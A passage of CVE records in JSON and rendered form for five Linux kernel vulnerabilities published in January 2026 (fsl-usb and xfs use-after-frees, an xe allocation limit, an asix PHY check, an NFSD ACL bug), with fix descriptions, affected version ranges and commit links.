"versionType": "git"
},
{
"lessThan": "319f7a85b3c4e34ac2fe083eb146fe129a556317",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "69f9a0701abc3d1f8225074c56c27e6c16a37222",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "41ca62e3e21e48c2903b3b45e232cf4f2ff7434f",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/phy/phy-fsl-usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: fsl-usb: Fix use-after-free in delayed work during device removal\n\nThe delayed work item otg_event is initialized in fsl_otg_conf() and\nscheduled under two conditions:\n1. When a host controller binds to the OTG controller.\n2. When the USB ID pin state changes (cable insertion/removal).\n\nA race condition occurs when the device is removed via fsl_otg_remove():\nthe fsl_otg instance may be freed while the delayed work is still pending\nor executing. This leads to use-after-free when the work function\nfsl_otg_event() accesses the already freed memory.\n\nThe problematic scenario:\n\n(detach thread) | (delayed work)\nfsl_otg_remove() |\n kfree(fsl_otg_dev) //FREE| fsl_otg_event()\n | og = container_of(...) //USE\n | og-\u003e //USE\n\nFix this by calling disable_delayed_work_sync() in fsl_otg_remove()\nbefore deallocating the fsl_otg structure. This ensures the delayed work\nis properly canceled and completes execution prior to memory deallocation.\n\nThis bug was identified through static analysis."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:56.261Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4476c73bbbb09b13a962176fca934b32d3954a2e"
},
{
"url": "https://git.kernel.org/stable/c/319f7a85b3c4e34ac2fe083eb146fe129a556317"
},
{
"url": "https://git.kernel.org/stable/c/69f9a0701abc3d1f8225074c56c27e6c16a37222"
},
{
"url": "https://git.kernel.org/stable/c/2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23"
},
{
"url": "https://git.kernel.org/stable/c/41ca62e3e21e48c2903b3b45e232cf4f2ff7434f"
}
],
"title": "usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68781",
"datePublished": "2026-01-13T15:28:56.261Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:56.261Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71076 (GCVE-0-2025-71076)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
Title
drm/xe/oa: Limit num_syncs to prevent oversized allocations
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/oa: Limit num_syncs to prevent oversized allocations
The OA open parameters did not validate num_syncs, allowing
userspace to pass arbitrarily large values, potentially
leading to excessive allocations.
Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,
returning -EINVAL when the limit is violated.
v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)
(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 803d418b73387fda392ddd83eace757ac25cf15d, < b963636331fb4f3f598d80492e2fa834757198eb (git) |
| Linux | Linux | Affected: c8507a25cebd179db935dd266a33c51bef1b1e80, < 338849090ee610ff6d11e5e90857d2c27a4121ab (git) |
| Linux | Linux | Affected: c8507a25cebd179db935dd266a33c51bef1b1e80, < f8dd66bfb4e184c71bd26418a00546ebe7f5c17a (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b963636331fb4f3f598d80492e2fa834757198eb",
"status": "affected",
"version": "803d418b73387fda392ddd83eace757ac25cf15d",
"versionType": "git"
},
{
"lessThan": "338849090ee610ff6d11e5e90857d2c27a4121ab",
"status": "affected",
"version": "c8507a25cebd179db935dd266a33c51bef1b1e80",
"versionType": "git"
},
{
"lessThan": "f8dd66bfb4e184c71bd26418a00546ebe7f5c17a",
"status": "affected",
"version": "c8507a25cebd179db935dd266a33c51bef1b1e80",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.13"
},
{
"lessThan": "6.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:28.759Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb"
},
{
"url": "https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab"
},
{
"url": "https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a"
}
],
"title": "drm/xe/oa: Limit num_syncs to prevent oversized allocations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71076",
"datePublished": "2026-01-13T15:31:28.759Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-13T15:31:28.759Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68784 (GCVE-0-2025-68784)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
xfs: fix a UAF problem in xattr repair
Summary
In the Linux kernel, the following vulnerability has been resolved:
xfs: fix a UAF problem in xattr repair
The xchk_setup_xattr_buf function can allocate a new value buffer, which
means that any reference to ab->value before the call could become a
dangling pointer. Fix this by moving an assignment to after the buffer
setup.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: e47dcf113ae348678143cc935a1183059c02c9ad, < 1e2d3aa19c7962b9474b22893160cb460494c45f (git) |
| Linux | Linux | Affected: e47dcf113ae348678143cc935a1183059c02c9ad, < d29ed9ff972afe17c215cab171761d7a15d7063f (git) |
| Linux | Linux | Affected: e47dcf113ae348678143cc935a1183059c02c9ad, < 5990fd756943836978ad184aac980e2b36ab7e01 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/xfs/scrub/attr_repair.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1e2d3aa19c7962b9474b22893160cb460494c45f",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
},
{
"lessThan": "d29ed9ff972afe17c215cab171761d7a15d7063f",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
},
{
"lessThan": "5990fd756943836978ad184aac980e2b36ab7e01",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/xfs/scrub/attr_repair.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:58.255Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1e2d3aa19c7962b9474b22893160cb460494c45f"
},
{
"url": "https://git.kernel.org/stable/c/d29ed9ff972afe17c215cab171761d7a15d7063f"
},
{
"url": "https://git.kernel.org/stable/c/5990fd756943836978ad184aac980e2b36ab7e01"
}
],
"title": "xfs: fix a UAF problem in xattr repair",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68784",
"datePublished": "2026-01-13T15:28:58.255Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:58.255Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71094 (GCVE-0-2025-71094)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
net: usb: asix: validate PHY address before use
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: usb: asix: validate PHY address before use
The ASIX driver reads the PHY address from the USB device via
asix_read_phy_addr(). A malicious or faulty device can return an
invalid address (>= PHY_MAX_ADDR), which causes a warning in
mdiobus_get_phy():
addr 207 out of range
WARNING: drivers/net/phy/mdio_bus.c:76
Validate the PHY address in asix_read_phy_addr() and remove the
now-redundant check in ax88172a.c.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < fc96018f09f8d30586ca6582c5045a84eafef146 (git) |
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < f5f4f30f3811d37e1aa48667c36add74e5a8d99f (git) |
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < 38722e69ee64dbb020028c93898d25d6f4c0e0b2 (git) |
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < 98a12c2547a44a5f03f35c108d2022cc652cbc4d (git) |
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < bf8a0f3b787ca7c5889bfca12c60c483041fbee3 (git) |
| Linux | Linux | Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b, < a1e077a3f76eea0dc671ed6792e7d543946227e8 (git) |
| Linux | Linux | Affected: 4e4f3cb41d687bd64cd03358862b23c84d82329e (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c",
"drivers/net/usb/ax88172a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fc96018f09f8d30586ca6582c5045a84eafef146",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "f5f4f30f3811d37e1aa48667c36add74e5a8d99f",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "38722e69ee64dbb020028c93898d25d6f4c0e0b2",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "98a12c2547a44a5f03f35c108d2022cc652cbc4d",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "bf8a0f3b787ca7c5889bfca12c60c483041fbee3",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "a1e077a3f76eea0dc671ed6792e7d543946227e8",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"status": "affected",
"version": "4e4f3cb41d687bd64cd03358862b23c84d82329e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c",
"drivers/net/usb/ax88172a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:55.502Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fc96018f09f8d30586ca6582c5045a84eafef146"
},
{
"url": "https://git.kernel.org/stable/c/f5f4f30f3811d37e1aa48667c36add74e5a8d99f"
},
{
"url": "https://git.kernel.org/stable/c/38722e69ee64dbb020028c93898d25d6f4c0e0b2"
},
{
"url": "https://git.kernel.org/stable/c/98a12c2547a44a5f03f35c108d2022cc652cbc4d"
},
{
"url": "https://git.kernel.org/stable/c/bf8a0f3b787ca7c5889bfca12c60c483041fbee3"
},
{
"url": "https://git.kernel.org/stable/c/a1e077a3f76eea0dc671ed6792e7d543946227e8"
}
],
"title": "net: usb: asix: validate PHY address before use",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71094",
"datePublished": "2026-01-13T15:34:54.669Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:55.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68803 (GCVE-0-2025-68803)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
NFSD: NFSv4 file creation neglects setting ACL
Summary
In the Linux kernel, the following vulnerability has been resolved:

NFSD: NFSv4 file creation neglects setting ACL

An NFSv4 client that sets an ACL with a named principal during file
creation retrieves the ACL afterwards, and finds that it is only a
default ACL (based on the mode bits) and not the ACL that was
requested during file creation. This violates RFC 8881 section
6.4.1.3: "the ACL attribute is set as given".

The issue occurs in nfsd_create_setattr(), which calls
nfsd_attrs_valid() to determine whether to call nfsd_setattr().
However, nfsd_attrs_valid() checks only for iattr changes and
security labels, but not POSIX ACLs. When only an ACL is present,
the function returns false, nfsd_setattr() is skipped, and the
POSIX ACL is never applied to the inode.

Subsequently, when the client retrieves the ACL, the server finds
no POSIX ACL on the inode and returns one generated from the file's
mode bits rather than returning the originally-specified ACL.

Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: c5409ce523af40d5c3019717bc5b4f72038d48be , < c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d (git) |
| Linux | Linux | Affected: d52acd23a327cada5fb597591267cfc09f08bb1d , < 75f91534f9acdfef77f8fa094313b7806f801725 (git) |
| Linux | Linux | Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 60dbdef2ebc2317266a385e4debdb1bb0e57afe1 (git) |
| Linux | Linux | Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 381261f24f4e4b41521c0e5ef5cc0b9a786a9862 (git) |
| Linux | Linux | Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < bf4e671c651534a307ab2fabba4926116beef8c3 (git) |
| Linux | Linux | Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 214b396480061cbc8b16f2c518b2add7fbfa5192 (git) |
| Linux | Linux | Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 913f7cf77bf14c13cfea70e89bcb6d0b22239562 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfsd/vfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d",
"status": "affected",
"version": "c5409ce523af40d5c3019717bc5b4f72038d48be",
"versionType": "git"
},
{
"lessThan": "75f91534f9acdfef77f8fa094313b7806f801725",
"status": "affected",
"version": "d52acd23a327cada5fb597591267cfc09f08bb1d",
"versionType": "git"
},
{
"lessThan": "60dbdef2ebc2317266a385e4debdb1bb0e57afe1",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "381261f24f4e4b41521c0e5ef5cc0b9a786a9862",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "bf4e671c651534a307ab2fabba4926116beef8c3",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "214b396480061cbc8b16f2c518b2add7fbfa5192",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "913f7cf77bf14c13cfea70e89bcb6d0b22239562",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfsd/vfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.121",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.220",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.121",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:14.365Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d"
},
{
"url": "https://git.kernel.org/stable/c/75f91534f9acdfef77f8fa094313b7806f801725"
},
{
"url": "https://git.kernel.org/stable/c/60dbdef2ebc2317266a385e4debdb1bb0e57afe1"
},
{
"url": "https://git.kernel.org/stable/c/381261f24f4e4b41521c0e5ef5cc0b9a786a9862"
},
{
"url": "https://git.kernel.org/stable/c/bf4e671c651534a307ab2fabba4926116beef8c3"
},
{
"url": "https://git.kernel.org/stable/c/214b396480061cbc8b16f2c518b2add7fbfa5192"
},
{
"url": "https://git.kernel.org/stable/c/913f7cf77bf14c13cfea70e89bcb6d0b22239562"
}
],
"title": "NFSD: NFSv4 file creation neglects setting ACL",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68803",
"datePublished": "2026-01-13T15:29:11.732Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:14.365Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
